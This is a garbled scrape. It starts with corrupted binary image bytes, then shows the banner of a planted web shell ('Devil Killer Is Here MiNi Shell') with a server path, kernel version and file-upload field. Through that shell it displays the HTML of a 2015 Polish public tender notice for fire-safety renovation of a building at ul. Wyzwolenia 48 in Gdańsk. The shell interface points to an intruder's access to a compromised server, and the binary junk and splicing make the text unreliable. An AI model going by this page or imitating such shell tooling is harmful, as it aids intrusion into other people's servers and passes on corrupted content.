JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151110/303760-N-2015.html

<p class="kh_header"><b>Gdańsk: dostosowanie  budynku przy ul Wyzwolenia 48 do obowiązujących przepisów p.poż</b><br>
<b>Numer ogłoszenia: 303760 - 2015; data zamieszczenia: 10.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdański Zarząd Nieruchomości Komunalnych - Samorządowy Zakład Budżetowy , ul. Partyzantów 74, 80-254 Gdańsk, woj. pomorskie, tel. 58 3201032, 3200220, 3023282, faks 58 3458235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gznk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostosowanie  budynku przy ul Wyzwolenia 48 do obowiązujących przepisów p.poż.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty  remontowe budynku użytkowego - zamieszkania zbiorowego przy ul. Wyzwolenia 48 związane z dostosowaniem budynku do aktualnych przepisów p.poż. <br>

Charakterystyczne parametry techniczne:<br>
Powierzchnia całkowita 	-      2 852,01 m2<br>
Powierzchnia zabudowy	-	  578,46 m2,<br>
Powierzchnia użytkowa	-	2 201,39 m2,<br>
Kubatura 				-     10 214,55 m3<br>	     
Wysokość budynku  	        -	     15,80 m.

Budynek posiada cztery kondygnacje  nadziemne i jedną podziemną. Na parterze znajduje się  przychodnia lekarska, natomiast na kondygnacjach wyższych  pokoje hotelowe, łazienki i kuchnie.<br>
W piwnicy znajdują się pomieszczenia techniczne i magazynowe.<br>
W części hotelowej budynku znajduje się  jedna klatka schodowa - żelbetowa, zamykana drzwiami.<br>
Klatka schodowa jest  wyposażoną w klapę dymową.<br>
Budynek budowany tradycyjnie - murowany, stropy DZ-3 a nad schronem strop żelbetowy. Stropodach  wentylowany  kryty papą.<br>
Budynek wyposażony jest w instalację wodno-kanalizacyjną, elektryczną, telefoniczną, centralne ogrzewanie i wentylację grawitacyjną.<br>

2.	Zakres robót obejmuje:<br>
2.1	.Roboty budowlane<br>
a)	roboty rozbiórkowe,<br>
b)	roboty konstrukcyjne i murarskie,<br>
c)	roboty montażowe,<br>
d)	roboty wykończeniowe,<br>
e)	roboty porządkowe,<br>
2.2	Roboty sanitarne<br>
a)	roboty demontażowe<br>
b)	budowa instalacji hydrantowej<br>
2.3	Roboty elektryczne<br>
a)	instalacja oświetlenia ewakuacyjnego<br>
b)	wykonanie systemu automatycznej sygnalizacji pożaru<br>
2.4	Roboty drogowe<br>
Wykonanie dodatkowego podjazdu (zatoki) dla pojazdów jednostek ochrony przeciwpożarowej.<br>
 

3.	Szczegółowy opis przedmiotu zamówienia stanowią:<br>
3.1.	Projekt budowlany. Dostosowanie  budynku zamieszkania zbiorowego do obowiązujących przepisów p.poż. Gdańsk ul. Wyzwolenia 48 dz. 190 obr. 060 - załącznik nr 1 do siwz.<br>
1)	Projekt budowlano - konstrukcyjny      					 - załącznik nr 1.1    do siwz<br>
- Rysunek nr 1- plan sytuacyjny	    				 	 - załącznik nr 1.1.1 do siwz,<br>
- Rysunek nr 2 roboty rozbiórkowe  - Rzut piwnic 	     		 - załącznik nr 1.1.2 do siwz,<br>
- Rysunek nr 3 roboty rozbiórkowe  - Rzut parteru	    		 - załącznik nr 1.1.3 do siwz,<br>
- Rysunek nr 4 roboty rozbiórkowe  - Rzut I piętra 	    		 - załącznik nr 1.1.4 do siwz,<br>
- Rysunek nr 5 roboty rozbiórkowe  - Rzut II piętra	    		 - załącznik nr 1.1.5 do siwz,<br>
- Rysunek nr 6 roboty rozbiórkowe  - Rzut III piętra	     		 - załącznik nr 1.1.6 do siwz,<br>
- Rysunek nr 7 roboty budowlane    - Rzut piwnic	     		 - załącznik nr 1.1.7 do siwz,<br>
- Rysunek nr 8 roboty  budowlane   - Rzut parteru		 - załącznik nr 1.1.8 do siwz,<br>
- Rysunek nr 9 roboty  budowlane   - Rzut  I piętra	    		 - załącznik nr 1.1.9 do siwz,<br>
- Rysunek nr 10 roboty budowlane  - Rzut  II piętra	     		 - załącznik nr 1.1.10 do siwz,<br>
- Rysunek nr 11 roboty budowlane  - Rzut  III piętra	    		- załącznik nr 1.1.11 do siwz,<br>
- Rysunek nr 12 roboty budowlane  - Rzut  dachu	     		- załącznik nr 1.1.12 do siwz,<br>
- Rysunek nr 13 roboty budowlane  - Przekrój A-A	     		- załącznik nr 1.1.13 do siwz,<br>
- Rysunek nr 14 roboty budowlane  - Elewacja frontowa    		- załącznik nr 1.1.14 do siwz,<br>
- Rysunek nr 15 roboty budowlane  - Elewacje tylna          		- załącznik nr 1.1.15 do siwz,<br>
- Rysunek nr 16 roboty budowlane  - Elewacje szczytowe  		- załącznik nr 1.1.16 do siwz,<br>
- Rysunek nr 17 roboty budowlane  - Zestawienie okien	     	- załącznik nr 1.1.17 do siwz,<br>
- Rysunek nr 18 roboty budowlane  - Zestawienie drzwi	     	- załącznik nr 1.1.18 do siwz,<br>
- Rysunek nr K-1 szczegóły konstrukcyjne		     		- załącznik nr 1.1.19 do siwz,<br>
2)	Droga pożarowa 	     				- załącznik nr 1.2 do siwz
- Rysunek nr 1- projekt zagospodarowania  zatoka p.poż	    	- załącznik nr 1.2.1 do siwz,<br>
 - Rysunek nr 2 - przekroje poprzeczne 	     		             	- załącznik nr 1.2.2 do siwz,<br>

3)	Instalacja hydrantowa      							- załącznik nr 1.3 do siwz<br>
- Rysunek nr 1	- Rzut piwnic	     			    	- załącznik nr 1.3.1 do siwz,<br>
- Rysunek nr 2	- Rzut parteru	     			     	- załącznik nr 1.3.2 do siwz,<br>
- Rysunek nr 3	- Rzut I pietra 	    		     		- załącznik nr 1.3.3 do siwz,<br>
- Rysunek nr 4	- Rzut II pietra 	    		    		- załącznik nr 1.3.4 do siwz,<br>
- Rysunek nr 5	- Rzut III pietra 	     		     		- załącznik nr 1.3.5 do siwz,<br>
- Rysunek nr 6	- Schemat instalacji hydrantowej 	     	- załącznik nr 1.3.6 do siwz,<br>
- Rysunek nr 7	- Pomieszczenie wodomierza 			- załącznik nr 1.3.7 do siwz<br>

4)	Instalacje elektryczne					- załącznik nr 1.4 do siwz<br>
- Rysunek nr E-001- Schemat  sygnalizacji pożaru     		- załącznik nr 1.4.1 do siwz,<br>
- Rysunek nr E-002 str. 1/2 - Schemat  główny tablicy TP    		- załącznik nr 1.4.2 do siwz<br>
- Rysunek nr E-002 str. 2/2 - Schemat  główny tablicy TP    		- załącznik nr 1.4.3 do siwz,<br>
- Rysunek nr E-01 - Plan instalacji sygnalizacji pożaru 		
  i oświetlenia  ewakuacyjnego  - Rzut piwnic 		- załącznik nr 1.4.4 do siwz,<br>
- Rysunek nr E-02 - Plan instalacji sygnalizacji pożaru 
  i oświetlenia  ewakuacyjnego - Rzut parteru 		- załącznik nr 1.4.5 do siwz,<br>
- Rysunek nr E-03 - Plan instalacji sygnalizacji pożaru 
  i oświetlenia  ewakuacyjnego - Rzut I pietra		- załącznik nr 1.4.6 do siwz,<br>
- Rysunek nr E-04 - Plan instalacji sygnalizacji pożaru 
  i oświetlenia  ewakuacyjnego - Rzut II pietra		- załącznik nr 1.4.7 do siwz,<br>
- Rysunek nr E-05 - Plan instalacji sygnalizacji pożaru 
  i oświetlenia  ewakuacyjnego - Rzut III pietra		- załącznik nr 1.4.8 do siwz,<br>
- Rysunek nr E-06 - Plan instalacji sygnalizacji pożaru 
   i oświetlenia  ewakuacyjnego - Rzut piwnic		- załącznik nr 1.4.9 do siwz,<br>
- Rysunek nr E-07 - Plan instalacji sygnalizacji pożaru 
  i oświetlenia  ewakuacyjnego - Rzut parteru		- załącznik nr 1.4.10 do siwz,<br>
- Rysunek nr E-08 - Plan instalacji sygnalizacji pożaru 
  i oświetlenia  ewakuacyjnego - Rzut I pietra		- załącznik nr 1.4.11 do siwz,<br>
- Rysunek nr E-09 - Plan instalacji sygnalizacji pożaru 
  	i oświetlenia  ewakuacyjnego - Rzut II pietra		- załącznik nr 1.4.12 do siwz<br>
- Rysunek nr E-10 - Plan instalacji sygnalizacji pożaru 
	         i oświetlenia  ewakuacyjnego - Rzut III pietra		- załącznik nr 1.4.13 do siwz,<br>
		- Rysunek nr E-11 - Widok tablicy TP		- załącznik nr 1.4.14 do siwz,<br>
 

3.2.	Projekt budowlano - wykonawczy. Dostosowanie  budynku zamieszkania zbiorowego do obowiązujących przepisów p.poż Gdańsk ul. Wyzwolenia 48 dz. 190 obr. 060       - załącznik nr 2 do siwz.<br>
 1) Projekt budowlano - konstrukcyjny      					- załącznik nr 2.1 do siwz<br>
- Rysunek nr 1- plan sytuacyjny	    				 	- załącznik nr 2.1.1 do siwz,<br>
- Rysunek nr 2 roboty rozbiórkowe  - Rzut piwnic 	     		- załącznik nr 2.1.2 do siwz,<br>
- Rysunek nr 3 roboty rozbiórkowe  - Rzut parteru	    		- załącznik nr 2.1.3 do siwz,<br>
- Rysunek nr 4 roboty rozbiórkowe  - Rzut I piętra 	    		- załącznik nr 2.1.4 do siwz,<br>
- Rysunek nr 5 roboty rozbiórkowe  - Rzut II piętra 	- załącznik nr 2.1.5 do siwz,<br>
- Rysunek nr 6 roboty rozbiórkowe  - Rzut III piętra	     	 	- załącznik nr 2.1.6 do siwz,<br>
- Rysunek nr 7 roboty budowlane    - Rzut piwnic	     		- załącznik nr 2.1.7 do siwz,<br>
- Rysunek nr 8 roboty  budowlane   - Rzut parteru		- załącznik nr 2.1.8 do siwz,<br>
- Rysunek nr 9 roboty  budowlane   - Rzut  I piętra	    		- załącznik nr 2.1.9 do siwz,<br>
- Rysunek nr 10 roboty budowlane  - Rzut  II piętra	     		- załącznik nr 2.1.10 do siwz,<br>
- Rysunek nr 11 roboty budowlane  - Rzut  III piętra	    		- załącznik nr 2.1.11 do siwz,<br>
- Rysunek nr 12 roboty budowlane  - Rzut  dachu	     		- załącznik nr 2.1.12 do siwz,<br>
- Rysunek nr 13 roboty budowlane  - Przekrój A-A	     		- załącznik nr 2.1.13 do siwz,<br>
- Rysunek nr 14 roboty budowlane  - Elewacja frontowa    		- załącznik nr 2.1.14 do siwz,<br>
- Rysunek nr 15 roboty budowlane  - Elewacje tylna          		- załącznik nr 2.1.15 do siwz,<br>
- Rysunek nr 16 roboty budowlane  - Elewacje szczytowe  		- załącznik nr 2.1.16 do siwz,<br>
- Rysunek nr 17 roboty budowlane  - Zestawienie okien	     	- załącznik nr 2.1.17 do siwz,<br>
- Rysunek nr 18 roboty budowlane  - Zestawienie drzwi	     	- załącznik nr 2.1.18 do siwz,<br>		 
- Rysunek nr K-1 szczegóły konstrukcyjne	- załącznik nr 2.1.19 do siwz,<br>
2)	Droga pożarowa 	     							- załącznik nr 2.2 do siwz<br>
- Rysunek nr 1- projekt zagospodarowania  zatoka p.poż	    	- załącznik nr 2.2.1 do siwz,<br>
- Rysunek nr 2 - przekroje poprzeczne 	     		             	- załącznik nr 2.2.2 do siwz,<br>
3)	Instalacja hydrantowa      						- załącznik nr 2.3 do siwz<br>
- Rysunek nr 1	- Rzut piwnic	     			    		- załącznik nr 2.3.1 do siwz,<br>
- Rysunek nr 2	- Rzut parteru	     			     		- załącznik nr 2.3.2 do siwz,<br>
- Rysunek nr 3	- Rzut I pietra 	    		     		- załącznik nr 2.3.3 do siwz,<br>
- Rysunek nr 4	- Rzut II pietra 	    		    		- załącznik nr 2.3.4 do siwz,<br>
- Rysunek nr 5	- Rzut III pietra 	     		     		- załącznik nr 2.3.5 do siwz,<br>
- Rysunek nr 6	- Schemat instalacji hydrantowej 	     	- załącznik nr 2.3.6 do siwz,<br>
- Rysunek nr 7	- Pomieszczenie wodomierza 			- załącznik nr 2.3.7 do siwz<br>
4)	Instalacje elektryczne							- załącznik nr 2.4 do siwz<br>
- Rysunek nr E-001- Schemat  sygnalizacji pożaru     		- załącznik nr 2.4.1 do siwz,<br>
- Rysunek nr E-002 str. 1/2 - Schemat  główny tablicy TP    		- załącznik nr 2.4.2 do siwz,<br>
- Rysunek nr E-002 str. 2/2 - Schemat  główny tablicy TP    		- załącznik nr 2.4.3 do siwz,<br>
- Rysunek nr E-01 - Plan instalacji sygnalizacji pożaru 		
  i oświetlenia  ewakuacyjnego  - Rzut piwnic 		- załącznik nr 2.4.4 do siwz,<br>
- Rysunek nr E-02 - Plan instalacji sygnalizacji pożaru 
  i oświetlenia  ewakuacyjnego - Rzut parteru 		- załącznik nr 2.4.5 do siwz,<br>
- Rysunek nr E-03 - Plan instalacji sygnalizacji pożaru 
  i oświetlenia  ewakuacyjnego - Rzut I pietra		- załącznik nr 2.4.6 do siwz,<br>
- Rysunek nr E-04 - Plan instalacji sygnalizacji pożaru 
  i oświetlenia  ewakuacyjnego - Rzut II pietra		- załącznik nr 2.4.7 do siwz,<br>
- Rysunek nr E-05 - Plan instalacji sygnalizacji pożaru 
  i oświetlenia  ewakuacyjnego - Rzut III pietra		- załącznik nr 2.4.8 do siwz,<br>
- Rysunek nr E-06 - Plan instalacji sygnalizacji pożaru 
   i oświetlenia  ewakuacyjnego - Rzut piwnic		- załącznik nr 2.4.9 do siwz,<br>
- Rysunek nr E-07 - Plan instalacji sygnalizacji pożaru 
  i oświetlenia  ewakuacyjnego - Rzut parteru		- załącznik nr 2.4.10 do siwz,<br>
- Rysunek nr E-08 - Plan instalacji sygnalizacji pożaru 
  i oświetlenia  ewakuacyjnego - Rzut I pietra		- załącznik nr 2.4.11 do siwz,<br>
- Rysunek nr E-09 - Plan instalacji sygnalizacji pożaru 
  i oświetlenia  ewakuacyjnego - Rzut II pietra		- załącznik nr 2.4.12 do siwz,<br>
- Rysunek nr E-10 - Plan instalacji sygnalizacji pożaru 
   i oświetlenia  ewakuacyjnego - Rzut III pietra		- załącznik nr 2.4.13 do siwz,<br>
- Rysunek nr E-11 - Widok tablicy TP		- załącznik nr 2.4.14 do siwz,<br>
3.3.	Ocena-Ekspertyza. Budynek zamieszkania zbiorowego Gdańsk ul. Wyzwolenia 48- załącznik nr 3 do siwz,<br>
- Rysunek nr 1		- rzut piwnicy	    				 - załącznik nr 3.1 do siwz,<br>
- Rysunek nr 2		- Rzut parteru	    				 - załącznik nr 3.2 do siwz,<br>
- Rysunek nr 3 	- Rzut I piętra 	    				 - załącznik nr 3.3 do siwz,<br>
- Rysunek nr 4		- Rzut II piętra	    	 			- załącznik nr 3.4 do siwz,<br>
- Rysunek nr 5 	- Rzut III piętra	     	 			- załącznik nr 3.5 do siwz,<br>
- Rysunek nr 6		- Rzut dachu	     					- załącznik nr 3.6 do siwz,<br>

- Rysunek nr 7 - Przekrój		- załącznik nr 3.7 do siwz,<br>
- Rysunek nr 8 zagospodarowanie terenu	     			- załącznik nr 3.8 do siwz.<br>
3.4.	Specyfikacja techniczna wykonania i odbioru robót - Roboty budowlane -  Dostosowanie  budynku zamieszkania zbiorowego do obowiązujących przepisów przeciwpożarowych. Gdańsk ul. Wyzwolenia 48 dz. 190 obr. 060 - załącznik nr 4 do siwz.<br>
3.5.	Specyfikacja techniczna wykonania i odbioru robót - Roboty instalacyjne. Instalacja  hydrantowa.   Dostosowanie  budynku użytkowego i zakwaterowania  zbiorowego zlokalizowanego  w Gdańsku  ul. Wyzwolenia 48  do obowiązujących przepisów p.poż.- załącznik nr 5 do siwz.<br>
3.6.	Specyfikacja techniczna wykonania i odbioru robót - Roboty instalacji elektrycznych.  Dostosowanie  budynku zakwaterowania  zbiorowego  w Gdańsku przy ul. Wyzwolenia 48  do obowiązujących przepisów p.poż.- załącznik nr 6 do siwz.<br>
3.7.	Przedmiar robót. Dostosowanie  budynku zamieszkania zbiorowego  do obowiązujących przepisów p. poż. Gdańsku, ul. Wyzwolenia 48 - załącznik nr 7 do siwz (o charakterze informacyjnym).<br>
3.8.	Przedmiar robót. Instalacja hydrantowa. - Dostosowanie  budynku do przepisów p. poż. Gdańsk, ul. Wyzwolenia 48 - załącznik nr 8 do siwz (o charakterze informacyjnym).<br>
3.9.	Przedmiar robót - branża teletechniczna. Budynek zamieszkania zbiorowego - instalacja SAP i oświetlenia awaryjnego. Gdańsk ul. Wyzwolenia 48 - załącznik nr 9 do siwz (o charakterze informacyjnym).<br>
4.	Pozostałe warunki wykonania zamówienia określone są we wzorze umowy stanowiącym załącznik do SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.23.31.40-2, 45.29.10.00-4, 45.26.20.00-1, 45.31.12.00-2, 45.31.21.00-8, 45.31.43.00-4, 45.31.70.00-2, 45.41.00.00-4, 45.42.10.00-4, 45.44.21.00-8, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> OFERTA MUSI BYĆ ZABEZPIECZONA WADIUM W WYSOKOŚCI 13 000,00 ZŁ</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia Wykonawca musiał wykonać w okresie ostatnich pięciu lat przed upływem terminu składania ofert minimum 2 roboty budowlane polegające na wykonaniu robót remontowych budynków o wartości nie mniejszej niż 300000,00 zł  brutto każda, obejmujące roboty ogólnobudowlane, sanitarne i elektryczne.<br>

Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunki mogą spełniać łącznie. <br>

Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków udowadniając, iż będzie dysponował zasobami w trakcie realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca musi wykazać dysponowanie: 5 osobami tj.: <br>
- 1 osobą, posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania w specjalności konstrukcyjno-budowlanej, <br>
- 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, <br>
- 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br>
- 1 osobą posiadającą uprawnienia do wykonywania pracy na stanowisku eksploatacji w zakresie montażu, remontu, kontrolno-pomiarowym urządzeń i instalacji należących do Grupy 1. Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające, przesyłające i zużywające energię elektryczną dla urządzeń i instalacji o napięciu nie wyższym niż 1 kV, zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy  i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania  kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci. (Dz.U. nr  89 poz. 828 z późn. zm.).<br>
Wyżej wymienione uprawnienia powinny upoważniać do wykonywania pomiarów ochronnych instalacji do 1 kV.<br>

Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.<br>

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował osobami zdolnymi do wykonania zamówienia w trakcie realizacji zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dotyczącego sytuacji ekonomicznej Wykonawca musi wykazać dysponowanie ubezpieczeniem od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej 700000,00 zł.<br>

W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek musi spełniać co najmniej jeden wykonawca.<br>

Wykonawca może polegać na zdolnościach ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w trakcie realizacji zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

